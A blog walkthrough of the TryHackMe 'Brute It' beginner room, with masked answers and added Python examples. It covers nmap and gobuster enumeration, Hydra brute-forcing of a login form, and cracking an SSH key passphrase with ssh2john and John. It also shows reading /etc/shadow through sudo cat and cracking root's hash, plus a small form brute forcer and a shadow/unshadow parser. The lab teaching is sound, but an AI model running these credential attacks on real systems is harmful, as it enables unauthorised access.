This room is super easy and it is perfect for beginners who want to try pentesting/hacking.
The skills/tools to be tested and needed to solve this room are: NMAP, Fuzzing/Enumeration, SSH, Brute Forcing, Hash Cracking, and Privilege Escalation.
This room was released on 11/06/2020 and it is rated easy in difficulty. Shout-out to the room creator, @reddyyz. You can access the room at https://tryhackme.com/room/bruteit.
I was assigned a target IP address of 10.10.184.109. You will be assigned a different IP address, so double check your entries when following this walk-through.
The requirements to complete this room are:
- How many ports are open?
- *
- What version of SSH is running?
- O****** *.**1
- What version of Apache is running?
- 2.*.**
- Which Linux distribution is running?
- U*****
- What is the hidden directory?
- /*****
- What is the user:password of the admin panel?
- a****:x*****
- What is John’s RSA private key passphrase?
- r*********
- User.txt
- THM{a*************************r}
- Web flag
- THM{b*****************y}
- What is root’s password?
- f*******
- Root.txt
- THM{p******************n}
Steps:
1. Scan the target using nmap. Type nmap -sC -sV -oA nmap/startup 10.10.184.109 (create the nmap directory first with mkdir nmap; nmap does not create it and the -oA write fails otherwise)
- -sC – run the default nmap scripts against the ports it finds
- -sV – pull version information from the open ports found during the scan
- -oA – save the results in three formats at once (normal .nmap, XML .xml, and grepable .gnmap), all named startup inside the nmap directory

- We found answers to the following:
- How many ports are open?
- *
- What version of SSH is running?
- O****** *.**1
- What version of Apache is running?
- 2.*.**
- Which Linux distribution is running?
- U*****
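The .gnmap file that -oA writes is the easiest one to answer these questions from later, without re-running the scan. The following is an added example (not code from the write-up or the room) that parses a grepable scan: it counts open ports and pulls the -sV version strings. The host, ports and version strings in the sample are constructed for the example and are deliberately not the room's answers.

```python
# Added example (not from the original write-up): parse the .gnmap file that
# nmap -oA writes (nmap/startup.gnmap in step 1) to answer "how many ports are
# open?" and "which versions?" from the saved scan instead of the terminal.
import re
from typing import Dict, List

# Constructed sample .gnmap output. Host, ports and versions are made up for
# this example; they are NOT the room's answers.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated Sat Jun 13 10:00:00 2020 as: nmap -sC -sV -oA nmap/startup 192.0.2.10\n"
    "Host: 192.0.2.10 ()\tStatus: Up\n"
    "Host: 192.0.2.10 ()\tPorts: "
    "22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/, "
    "443/filtered/tcp//https///\tIgnored State: closed (997)\n"
    "# Nmap done at Sat Jun 13 10:01:00 2020 -- 1 IP address (1 host up) scanned in 60.00 seconds\n"
)

# Each port entry in a grepable line has seven slash-separated fields:
# port/state/protocol/owner/service/rpc-info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/[^/]*/([^/]*)/")


def parse_gnmap(text: str) -> Dict[str, List[dict]]:
    """Return {host: [{port, state, proto, service, version}, ...]}."""
    hosts: Dict[str, List[dict]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and the "Status: Up" line carry no port data
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        entries = []
        for port, state, proto, service, version in PORT_RE.findall(ports_field):
            entries.append({"port": int(port), "state": state, "proto": proto,
                            "service": service, "version": version.strip()})
        hosts[host] = entries
    return hosts


def open_ports(entries: List[dict]) -> List[int]:
    """Only 'open' counts toward the room's first question; filtered does not."""
    return [e["port"] for e in entries if e["state"] == "open"]


def service_versions(entries: List[dict]) -> Dict[int, str]:
    """Map each open port to the version string -sV detected (may be empty)."""
    return {e["port"]: e["version"] for e in entries if e["state"] == "open"}


if __name__ == "__main__":
    for host, entries in parse_gnmap(SAMPLE_GNMAP).items():
        print(f"{host}: {len(open_ports(entries))} open port(s)")
        for port, version in service_versions(entries).items():
            print(f"  {port}/tcp  {version}")
```

To use it on your own scan, read nmap/startup.gnmap into a string and pass it to parse_gnmap. Note that a filtered port is listed in the file but is not open, which is why the count filters on state.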
2. The web service is open on port 80, so let’s check it by opening a web browser and typing the IP address in the URL bar: http://10.10.184.109

***There is nothing in the page source, so let’s go ahead and enumerate the web service
3. Enumerate the web service using gobuster. Type gobuster dir -u http://10.10.184.109 -w /usr/share/wordlists/dirb/common.txt | tee gobuster
- dir – use directory/file brute-forcing mode
- -u – the URL to scan
- -w – the wordlist of candidate directory and file names
- | tee gobuster – pipe the output through tee, which prints it to the terminal and also saves a copy to a file named gobuster

- We found the answer to what is the hidden directory?
- /*****
4. Visit the hidden directory found above by opening a web browser and type 10.10.184.109/*****

5. Check the page source code by right-clicking a blank part of the webpage and choose View Page Source

***We can see a username in cleartext that we can use for the admin portal
6. Now that we have a username, we have to brute force the password with Hydra. But first we use Burp Suite to capture our client’s HTTP request and the server’s response. Open Burp Suite, proxy the browser through it, and try to log in to the portal so Burp captures the interaction. From the request we need the form path and the parameter names, and from the response the text shown when the login fails; Hydra needs all three


7. Use Hydra to brute force the password. Type hydra -l ***** -P /usr/share/wordlists/rockyou.txt 10.10.184.109 http-post-form "/*****/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid" (use straight double quotes; the username, form path and failure message are the ones you read from the Burp capture in step 6)
- -l – lowercase L, a single known username
- -P – uppercase P, a wordlist of candidate passwords (a lowercase -p would be a single password)
- http-post-form – the Hydra module for login forms submitted with an HTTP POST; its argument is the form path, the POST body and a match condition, separated by colons
- ^USER^ – placeholder Hydra replaces with the username in each request
- ^PASS^ – placeholder Hydra replaces with the password candidate in each request
- F= – text that appears in the response when the login fails; any response without it is treated as a successful login, so this string must be copied exactly from a real failed attempt or every guess will look like a hit

- We found the answer to what is the user:password of the admin panel?
- a****:x*****
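The rule Hydra applies is simple, and seeing it in code makes the F= pitfall obvious. The following is an added example, not code from the write-up or from Hydra: a minimal POST-form brute forcer with the same F= (failure text absent) and S= (success text present) conditions, run against a constructed in-process stand-in for the admin panel. The credentials in the mock, the form field names beyond user/pass, and the http_post helper are assumptions for the example.

```python
# Added example (not from the original write-up): the decision rule behind
# Hydra's http-post-form module, in plain Python, so it is clear why the F=
# failure string must be copied exactly from the real "login failed" response.
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

# Failure text as read from the server response captured in Burp (step 6).
FAIL_STRING = "Username or password invalid"


def http_post(url: str, form: dict) -> str:
    """Real transport: POST a form to the target and return the response body."""
    data = urllib.parse.urlencode(form).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def brute_force(user: str, wordlist: Iterable[str], cond: Tuple[str, str],
                send: Callable[[dict], str]) -> Optional[str]:
    """Try each password; return the first one whose response satisfies cond.

    cond is ("F", text): success when text is ABSENT from the response, or
    ("S", text): success when text is PRESENT, the two conditions the Hydra
    module accepts. Field names user/pass mirror the command on the page.
    """
    kind, text = cond
    for password in wordlist:
        body = send({"user": user, "pass": password})
        hit = (text not in body) if kind == "F" else (text in body)
        if hit:
            return password
    return None


# --- Constructed stand-in for the admin panel (no network needed) -----------
# Made-up credentials; the real room answer is not reproduced here.
def mock_login(form: dict) -> str:
    if form.get("user") == "admin" and form.get("pass") == "sunflower1":
        return "<html><body><h1>Welcome back, admin</h1></body></html>"
    return "<html><body><p>Username or password invalid</p></body></html>"


WORDLIST = ["123456", "password", "sunflower1", "letmein"]  # tiny stand-in for rockyou


if __name__ == "__main__":
    print("correct F=:", brute_force("admin", WORDLIST, ("F", FAIL_STRING), mock_login))
    # A failure string that never appears makes EVERY attempt look like a
    # success, so the first candidate is reported: a false positive.
    print("wrong F=:  ", brute_force("admin", WORDLIST, ("F", "Login failed"), mock_login))
    print("S=Welcome: ", brute_force("admin", WORDLIST, ("S", "Welcome"), mock_login))
    # Against the real box you would bind the transport to the target URL:
    # brute_force("admin", rockyou_lines, ("F", FAIL_STRING),
    #             lambda form: http_post("http://10.10.184.109/<hidden dir>/index.php", form))
```

The second call is the failure mode to remember: a mistyped F= string does not make Hydra error out, it makes the very first password "succeed". If a real target redirects on success rather than rendering a page, an S= condition on the redirect target (or Hydra's own follow-redirect option) is the safer choice.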
8. Login to the admin panel

- We found the answer to web flag
- THM{b*****************y}
9. Click the link to view John’s RSA private key. Copy the whole block, including the BEGIN and END lines, and save it in a file on your attack machine (for example john_rsa)


10. Convert the private key into a hash format that John the Ripper understands, using ssh2john. The script does not decrypt anything: it pulls the cipher, salt/IV and ciphertext out of the key file so John can test passphrases against them. Type python /usr/share/john/ssh2john.py john_rsa > brute.txt (on newer distributions the script may need python3 instead of python)


11. Crack the hash with John the Ripper. Type /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt brute.txt. If John reports that the hash was already cracked in an earlier run, display it with /usr/sbin/john --show brute.txt

- We found the answer to what is John’s RSA private key passphrase?
- r*********
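What ssh2john extracts depends on which of the two private key file formats you were given, and that also decides how fast John can try passphrases. The following added example (not code from the write-up or from ssh2john) parses both formats and reports the cipher, the KDF and, for the newer OpenSSH format, the bcrypt round count. The sample keys are constructed with filler bodies; they contain no key material and are not the room's key.

```python
# Added example (not from the original write-up): what ssh2john actually reads
# out of a private key file. Nothing is "unhashed": the key is encrypted with
# a cipher keyed from the passphrase, and John simply tries passphrases through
# the same KDF. This parser reports the cipher/KDF for both key file formats.
import base64
import re
import struct


def _ssh_string(blob: bytes, off: int):
    """Read one length-prefixed (uint32 big-endian) string from an SSH blob."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def key_encryption_info(key_text: str) -> dict:
    lines = [l.strip() for l in key_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        # New format: base64 of "openssh-key-v1\0" + ciphername + kdfname + kdfoptions ...
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(magic)
        cipher, off = _ssh_string(blob, off)
        kdf, off = _ssh_string(blob, off)
        kdfopts, off = _ssh_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":           # kdfoptions = string salt + uint32 rounds
            _salt, o = _ssh_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM ("BEGIN RSA PRIVATE KEY"): encryption is signalled by two headers,
    # and the key is derived with OpenSSL's MD5-based EVP_BytesToKey (fast to crack).
    m = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)$", key_text, re.M)
    encrypted = "Proc-Type: 4,ENCRYPTED" in key_text and m is not None
    return {"format": "pem", "encrypted": encrypted,
            "cipher": m.group(1) if m else "none",
            "kdf": "EVP_BytesToKey(MD5)" if encrypted else None,
            "iv": m.group(2) if m else None}


# --- Constructed sample keys (not real keys; bodies are filler) --------------
LEGACY_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF\n\n"
    + base64.b64encode(b"constructed filler, not key material " * 2).decode()
    + "\n-----END RSA PRIVATE KEY-----\n"
)


def _pack(s: bytes) -> bytes:
    return struct.pack(">I", len(s)) + s


def _openssh_key(cipher: bytes, kdf: bytes, kdfopts: bytes) -> str:
    blob = (b"openssh-key-v1\x00" + _pack(cipher) + _pack(kdf) + _pack(kdfopts)
            + struct.pack(">I", 1) + _pack(b"constructed public key")
            + _pack(b"constructed private section"))
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


ENCRYPTED_OPENSSH = _openssh_key(b"aes256-ctr", b"bcrypt", _pack(b"\x11" * 16) + struct.pack(">I", 16))
PLAIN_OPENSSH = _openssh_key(b"none", b"none", b"")

if __name__ == "__main__":
    for name, key in [("legacy PEM", LEGACY_PEM), ("openssh encrypted", ENCRYPTED_OPENSSH),
                      ("openssh plain", PLAIN_OPENSSH)]:
        print(name, key_encryption_info(key))
```

The practical point: a legacy PEM key (Proc-Type/DEK-Info headers) derives its cipher key with a single MD5 pass, so rockyou finishes quickly; a newer "BEGIN OPENSSH PRIVATE KEY" file uses bcrypt with the round count shown here, and each guess costs orders of magnitude more. If the parser reports encrypted False, skip the cracking step entirely and go straight to ssh -i.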
12. SSH to the server with the key. First restrict the key file’s permissions with chmod 600 john_rsa, because ssh refuses to use a private key that other users can read. Then type ssh -i john_rsa john@10.10.184.109 and enter the passphrase we found in step 11

13. Look for user.txt by typing find / -type f -name user.txt 2>/dev/null (the redirect hides the permission-denied errors from directories we cannot read), then use cat to read the file

- We found the answer to user.txt
- THM{a*************************r}
14. To check whether our current user can run anything with sudo, type sudo -l

15. sudo -l shows that we can run cat as root, so read root.txt with sudo cat /root/root.txt

- We found the answer to root.txt
- THM{p******************n}
16. Since we can run cat as root, read /etc/shadow and grab the hashed password of the user root. Type sudo cat /etc/shadow

17. Copy root’s entire line, from "root" through the trailing ":::", into a text file on your attack machine (rootpw.txt). Crack root’s hashed password with John. Type john rootpw.txt. With no options John runs its default modes (single, its built-in wordlist, then incremental); to use rockyou as in step 11, type john --wordlist=/usr/share/wordlists/rockyou.txt rootpw.txt, and john --show rootpw.txt prints the result afterwards
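Knowing what John will see in that line, and why the unshadow tool exists, helps when a box has several accounts. The following added example (not code from the write-up, from John or from unshadow) splits a shadow entry into its fields, identifies the hash type from the $id$ prefix, filters out locked accounts, and merges /etc/passwd with /etc/shadow the way unshadow does so John's single mode can also draw on the account's GECOS data. The sample passwd and shadow files are constructed, and the hash bodies are placeholders of the right length that will not crack.

```python
# Added example (not from the original write-up): read the /etc/shadow entries
# from steps 16/17, identify the hash type John will see, and merge them with
# /etc/passwd the way the unshadow tool does. Sample files are constructed; the
# hash bodies are placeholders and will not crack.
from typing import Dict, List

# $id$ prefix -> algorithm as John names it
HASH_ALGOS: Dict[str, str] = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt", "gy": "gost-yescrypt",
}


def parse_shadow_line(line: str) -> dict:
    """Break one shadow line into its nine fields and classify the secret."""
    f = line.rstrip("\n").split(":")
    if len(f) != 9:
        raise ValueError(f"expected 9 colon-separated fields, got {len(f)}")
    user, secret = f[0], f[1]
    info = {"user": user, "algorithm": None, "salt": None, "rounds": None,
            "crackable": False, "last_change_days": f[2]}
    if secret == "":
        info["algorithm"] = "none (empty password)"
        return info
    if secret.startswith(("*", "!")):           # '!' or '*' = locked, nothing to crack
        info["algorithm"] = "locked"
        return info
    parts = secret.split("$")
    if len(parts) < 3 or parts[0] != "":
        info.update(algorithm="descrypt (traditional DES)", crackable=True)
        return info
    ident = parts[1]
    info.update(algorithm=HASH_ALGOS.get(ident, f"unknown id ${ident}$"), crackable=True)
    if ident in ("1", "5", "6"):                 # crypt(3) family: [$rounds=N]$salt$hash
        rest = parts[2:]
        if rest[0].startswith("rounds="):
            info["rounds"] = int(rest[0][len("rounds="):])
            rest = rest[1:]
        info["salt"] = rest[0]
        if info["rounds"] is None:
            info["rounds"] = 1000 if ident == "1" else 5000   # fixed/default round counts
    return info


def crackable_lines(shadow_text: str) -> List[str]:
    """Only the entries worth feeding to John (skips locked and empty accounts)."""
    return [l for l in shadow_text.splitlines() if l and parse_shadow_line(l)["crackable"]]


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Replace the 'x' in each passwd line with the shadow hash (what unshadow does)."""
    secrets = {l.split(":")[0]: l.split(":")[1] for l in shadow_text.splitlines() if l}
    merged = []
    for line in passwd_text.splitlines():
        if not line:
            continue
        f = line.split(":")
        if f[0] in secrets:
            f[1] = secrets[f[0]]
        merged.append(":".join(f))
    return "\n".join(merged) + "\n"


# --- Constructed sample files -------------------------------------------------
FAKE_SHA512 = "A" * 86      # right length for a $6$ hash body, but not a real digest
SHADOW = (
    f"root:$6$Zx9constructed${FAKE_SHA512}:18400:0:99999:7:::\n"
    "john:$y$j9T$constructedsalt$constructedhash:18400:0:99999:7:::\n"
    "daemon:*:18400:0:99999:7:::\n"
    "sshd:!:18400:0:99999:7:::\n"
)
PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "john:x:1000:1000:john:/home/john:/bin/bash\n"
)

if __name__ == "__main__":
    for line in SHADOW.splitlines():
        print(parse_shadow_line(line))
    print("entries for john:", len(crackable_lines(SHADOW)))
    print(unshadow(PASSWD, SHADOW))  # save as unshadowed.txt, then: john unshadowed.txt
```

Copying only root's line, as the walkthrough does, is fine for one account; on a multi-user box the merged file lets a single John run cover every crackable account and lets John's single mode try usernames and GECOS names first, which is often enough for weak local passwords.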
Hope you had fun with this room and write-up. Please subscribe to my blog to get notified when I upload new content.
Happy hacking!
Well done, but “super easy”? Now I can’t do it cuz if I struggle then what does that say about me?
Haha, you crack me up with your comments, man. Then you’re just like me, who struggles with these things too.